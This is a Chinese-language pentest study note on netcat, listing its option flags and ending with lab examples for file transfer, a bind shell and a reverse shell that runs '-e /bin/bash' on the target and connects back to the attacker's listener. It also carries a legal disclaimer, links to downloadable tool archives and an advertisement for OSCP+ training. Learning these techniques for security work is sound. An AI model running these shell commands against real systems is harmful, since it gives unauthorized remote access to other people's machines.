nc参数和使用方式

公众号：泷羽Sec-Ceo

---

声明！
        学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下，如涉及侵权马上删除文章，笔记只是方便各位师傅的学习和探讨，文章所提到的网站以及内容，只做学习交流，其他均与本人以及泷羽sec团队无关，切勿触碰法律底线，否则后果自负！！！！有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294)

---

系统和工具

        链接：https://pan.quark.cn/s/7c366373a85e
                提取码：5cuD

        链接：https://pan.baidu.com/s/1Rn7mA_-aEh60L_iX4PWjzg?pwd=2w25 
                提取码：2w25
        解压密码：SecCeo或Sec工具

        

        所提供的工具资料仅供学习之用。这些资料旨在帮助用户增进知识、提升技能，并促进个人成长与学习。用户在使用这些资料时，应严格遵守相关法律法规，不得将其用于任何非法、欺诈、侵权或其他不当用途。本人和团队不对用户因使用这些资料而产生的任何后果负责，包括但不限于因操作不当、误解资料内容或违反法律法规而导致的损失或损害。用户应自行承担使用这些资料的风险，并在使用前进行充分的了解和评估。

---

        团队目前在筹备OSCP+的培训，费用4000，跟其他培训比，泷羽Sec绝对优惠，泷羽Sec的泷老师，是一名资深高级红队队长，拥有OSEP，CISSP，OSCP等等含金量极高的证书。报名可以在”泷羽Sec-Ceo“咨询一下

 

netcat（nc）

选项参数：

        -c shell 命令作为 '-e';使用 /bin/sh 执行 [危险！！]

        -e 将程序文件名设置为连接后执行 [危险！！]

        -b 允许广播

        -g 网关，设置路由器跃程通信网关，最多设置8个

        -G num 源路由指针： 设置来源路由指向器，其数值为4的倍数

        -h 帮助文档

        -i 设置时间间隔，以便传送信息及扫描通信端口;

        -k 在套接字上设置 keepalive 选项

        -l 使用监听模式

        -n 直接使用ip地址，而不通过域名服务器

        -o 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存

        -p 设置本地主机使用的通信端口

        -r 随机化本地和远程端口

        -q 秒在 stdin 上的 EOF 后退出，并延迟秒

        -s 设置本地主机送出数据包的IP地址

        -T tos set 类型

       -t answer TELNET 协商

        -u UDP 模式

        -v 显示指令执行过程

        -w 设置等待连线的时间

        -C 将 CRLF 作为行尾发送

        -z 使用输入/输出模式，只在扫描通信端口时使用

端口号可以是单个端口号，也可以是范围：Lo-Hi [含];

端口名称中的连字符必须反斜杠转义（例如 'ftp-data'）。

例子

利用nc传输文件s

       监听192.168.20.102本地8080端口

              nc -nvlp 8080 < 1.txt

       目标靶机

              nc -nv 192.168.20.102 8080 > 1.txt

利用nc获取shell

        正向shell

       目标靶机

       nc -nvlp 8080 -e /bin/bash

       本机

       nc -nv 192.168.20.100 8080

        反向shell

       本机

       nc -nvlp 8888

       目标靶机

       nc -nv 192.168.20.102 8888 -e /bin/bash

        成功连接